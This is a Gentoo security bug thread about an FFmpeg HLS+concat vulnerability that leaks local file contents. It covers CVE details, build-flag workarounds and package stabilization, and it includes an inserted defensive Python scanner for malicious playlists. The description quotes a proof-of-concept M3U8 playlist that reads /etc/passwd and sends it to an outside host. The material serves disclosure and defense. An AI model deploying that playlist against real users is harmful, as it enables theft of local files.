Bug 571868 - <media-video/ffmpeg-2.8.5: stealing local files with HLS+concat (CVE-2016-{1897,1898,2326,2327})
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal minor
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: A4 [glsa]
Keywords:
Duplicates: 565684 572050 572244
Depends on: 565684 570878
Blocks:
Reported: 2016-01-14 10:17 UTC by Agostino Sarubbo
Modified: 2016-06-19 00:01 UTC (History)
Description Agostino Sarubbo gentoo-dev 2016-01-14 10:17:26 UTC
From ${URL} :

Hello!
I found some strange behavior in ffmpeg which can lead to stealing local
files during ffmpeg/ffprobe execution; it also applies to libav.

I've underestimated the impact of this bug, so it was fully disclosed
in this article (Russian language, but Google Translate works fine with
it) - http://habrahabr.ru/company/mailru/blog/274855


In short:
if a Linux user downloads a specially prepared video file (with any
extension: avi/mov/etc.) which contains an HLS m3u8 playlist with the "concat"
protocol in a URL:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

header.m3u8:
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://example.org?

If user launches ffmpeg-based video player (MPlayer, etc..), first line
of /etc/passwd will be sent to http://example.org? in
http://example.org?# $FreeBSD: release/100.0/et..  request.
The same happens when file manager tries to generate thumbnail for this
file.

All this can be applied to server-run ffmpeg during video conversion.
FFmpeg/libav security teams are already notified, but official patches
are not available yet, so you can rebuild ffmpeg with --disable-network
configure option which prevents this vulnerability from being exploited.

Moreover, it's always recommended to run ffmpeg in an isolated environment
when processing untrusted files
(googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html)



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
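The report above boils down to three facts: the HLS demuxer keys on the #EXTM3U magic rather than the file extension, playlist lines are opened as URLs, and a URL can nest other protocols (concat:, subfile:, file:) so that local file contents end up in an outbound HTTP request. The following Python pre-check is an added example for this bug report, not FFmpeg, Gentoo or the reporter's code: it refuses to hand a file to a thumbnailer or transcoder when it is really a playlist whose segment URIs use any scheme outside an allowlist, at top level or nested inside another protocol. The allowlist (ALLOWED_SCHEMES), the placeholder host and both sample playlists are constructed assumptions.

```python
"""Pre-check an untrusted media file before an ffmpeg-based thumbnailer or
transcoder sees it: if it is really an HLS (M3U8) playlist, flag any segment
URI whose scheme, at top level or nested inside another protocol, is not on
an allowlist.

Added example for this bug report; not FFmpeg, Gentoo or the reporter's code.
ALLOWED_SCHEMES and the two sample playlists are constructed assumptions.
"""
import re
from typing import List, Optional, Tuple

# Assumption: a playlist fetched from the web only needs plain HTTP(S)
# segments. concat:, subfile:, file:, data: and friends are reported.
ALLOWED_SCHEMES = {"http", "https"}

# Top-level protocol name: text before the first ':' or ','
# (ffmpeg's "subfile,,start,0,end,10,,:url" option syntax uses ',').
TOP_SCHEME_RE = re.compile(r"([A-Za-z][A-Za-z0-9+.-]*)[:,]")

# A scheme token anywhere in the string that is not part of a host name
# (not preceded by '/', '.', '@' or another scheme character), so that
# "concat:http://h/p|file:///etc/passwd" yields http and file while
# "https://cdn.example:8443/a.ts" yields only https.
NESTED_SCHEME_RE = re.compile(r"(?<![A-Za-z0-9+./@-])([A-Za-z][A-Za-z0-9+.-]*):")


def is_hls_playlist(data: bytes) -> bool:
    """The HLS demuxer keys on the M3U8 magic, not on the file extension,
    so a .avi or .mov that starts with #EXTM3U is still a playlist."""
    return data.lstrip().startswith(b"#EXTM3U")


def segment_uris(text: str) -> List[str]:
    """Non-empty, non-tag lines of a playlist: the URIs the demuxer opens."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def uri_schemes(uri: str) -> List[str]:
    """Top-level scheme followed by every scheme nested inside it; an empty
    list for a relative segment such as 'seg1.ts'."""
    schemes: List[str] = []
    top = TOP_SCHEME_RE.match(uri)
    if top:
        schemes.append(top.group(1).lower())
    for m in NESTED_SCHEME_RE.finditer(uri):
        s = m.group(1).lower()
        if s not in schemes:
            schemes.append(s)
    return schemes


def scan_playlist(text: str, allowed=ALLOWED_SCHEMES) -> List[Tuple[str, List[str]]]:
    """(uri, offending schemes) for each segment using a non-allowlisted scheme."""
    findings = []
    for uri in segment_uris(text):
        bad = [s for s in uri_schemes(uri) if s not in allowed]
        if bad:
            findings.append((uri, bad))
    return findings


def scan_file_bytes(data: bytes) -> Optional[List[Tuple[str, List[str]]]]:
    """None when the file is not an M3U8 playlist, otherwise the findings."""
    if not is_hls_playlist(data):
        return None
    return scan_playlist(data.decode("utf-8", errors="replace"))


# Constructed samples: the shape from the report (with a placeholder host)
# and a benign playlist with absolute and relative segments.
MALICIOUS = b"""#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://playlist.example/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
"""
BENIGN = b"""#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
https://cdn.example:8443/seg0.ts
#EXTINF:10.0,
seg1.ts
#EXT-X-ENDLIST
"""

if __name__ == "__main__":
    for name, blob in (("malicious", MALICIOUS), ("benign", BENIGN), ("avi", b"RIFF....AVI ")):
        print(name, scan_file_bytes(blob))
```

A non-empty result from scan_file_bytes means the file should not be passed to ffmpeg at all on a host that still runs a vulnerable build. The check is a gate in front of the thumbnailer or conversion job, not a replacement for the fixes discussed in this bug (upgrading to a release listed on ffmpeg.org/security.html, building with --disable-network, or disabling the hls demuxer and the concat/hls protocols) or for running ffmpeg in an isolated environment.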
Comment 1 Shiba 2016-01-14 12:26:16 UTC
Archlinux rebuilt ffmpeg only with

--disable-demuxer='hls' --disable-protocol='concat,hls'

to workaround this bug, without disabling network capabilities in general.
Comment 3 Brian Evans (RETIRED) gentoo-dev 2016-01-16 01:47:09 UTC
*** Bug 572050 has been marked as a duplicate of this bug. ***
Comment 4 Alexis Ballier gentoo-dev 2016-01-16 09:36:02 UTC
from: http://ffmpeg.org/security.html

2.8.5
Fixes following vulnerabilities:

CVE-2016-1897,CVE-2016-1898, 23b903aaf4eefb1ce1396a32525c8e5501d5cec8 / 6ba42b6482c725a59eb468391544dc0c75b8c6f0
CVE-2016-1897,CVE-2016-1898, b7d54d6e072690a62d5ea5ade66ffce6944a5ff4 / 7145e80b4f78cff5ed5fee04d4c4d53daaa0e077
CVE-2016-1897,CVE-2016-1898, 28f89bc439be1de9a61ac404ce79f9bc4cac5ec8 / cfda1bea4c18ec1edbc11ecc465f788b02851488


so, 2.8.5 should fix it.

stabilization process was started in bug #565684, but you can cc arches here if you prefer
Comment 5 Mike Limansky 2016-01-17 08:39:58 UTC
According to this http://ffmpeg.org/index.html#news, 2.7.5, 2.6.7 and 2.5.10 also contain the fix for these vulnerabilities. So 2.6.7 can go stable (since 2.6 is the current stable branch in Gentoo).
Comment 6 nE0sIghT 2016-01-18 13:07:16 UTC
*** Bug 572244 has been marked as a duplicate of this bug. ***
Comment 7 Mike Limansky 2016-01-18 19:30:34 UTC
I've checked ffmpeg-2.6.7 emerged successfully with renamed ffmpeg-2.6.4.ebuild.
Comment 8 Alexis Ballier gentoo-dev 2016-01-24 14:37:35 UTC
well, since sec team seems busy, ccing arches here

@arch teams: target is =media-video/ffmpeg-2.8.5

you'll likely need x265 (bug #570878)
Comment 9 Agostino Sarubbo gentoo-dev 2016-01-25 10:57:26 UTC
amd64 stable
Comment 10 Agostino Sarubbo gentoo-dev 2016-01-25 10:57:58 UTC
x86 stable
Comment 11 Jeroen Roovers (RETIRED) gentoo-dev 2016-01-27 15:08:05 UTC
Stable for HPPA PPC64.
Comment 12 Tobias Klausmann (RETIRED) gentoo-dev 2016-01-30 17:43:36 UTC
Stable on alpha, took app-arch/snappy along.
Comment 13 Pacho Ramos gentoo-dev 2016-01-31 16:54:33 UTC
*** Bug 565684 has been marked as a duplicate of this bug. ***
Comment 14 Markus Meier gentoo-dev 2016-02-03 20:42:56 UTC
arm stable
Comment 15 GLSAMaker/CVETool Bot gentoo-dev 2016-03-15 09:40:56 UTC
CVE-2016-2327 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2327):
  libavcodec/pngenc.c in FFmpeg before 2.8.5 uses incorrect line sizes in
  certain row calculations, which allows remote attackers to cause a denial of
  service (out-of-bounds array access) or possibly have unspecified other
  impact via a crafted .avi file, related to the apng_encode_frame and
  encode_apng functions.

CVE-2016-2326 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2326):
  Integer overflow in the asf_write_packet function in libavformat/asfenc.c in
  FFmpeg before 2.8.5 allows remote attackers to cause a denial of service or
  possibly have unspecified other impact via a crafted PTS (aka presentation
  timestamp) value in a .mov file.
Comment 16 GLSAMaker/CVETool Bot gentoo-dev 2016-03-15 09:41:30 UTC
CVE-2016-1898 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1898):
  FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read
  arbitrary files by using the subfile protocol in an HTTP Live Streaming
  (HLS) M3U8 file, leading to an external HTTP request in which the URL string
  contains an arbitrary line of a local file.

CVE-2016-1897 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1897):
  FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read
  arbitrary files by using the concat protocol in an HTTP Live Streaming (HLS)
  M3U8 file, leading to an external HTTP request in which the URL string
  contains the first line of a local file.
Comment 17 Agostino Sarubbo gentoo-dev 2016-03-16 14:11:08 UTC
ppc stable
Comment 18 Agostino Sarubbo gentoo-dev 2016-03-19 11:37:57 UTC
sparc stable
Comment 19 Agostino Sarubbo gentoo-dev 2016-03-20 12:01:58 UTC
ia64 stable.

Maintainer(s), please cleanup.
Security, please vote.
Comment 20 Aaron Bauman (RETIRED) gentoo-dev 2016-03-20 12:21:31 UTC
Added to existing GLSA.
Comment 21 GLSAMaker/CVETool Bot gentoo-dev 2016-06-19 00:01:18 UTC
This issue was resolved and addressed in
 GLSA 201606-09 at https://security.gentoo.org/glsa/201606-09
by GLSA coordinator Kristian Fiskerstrand (K_F).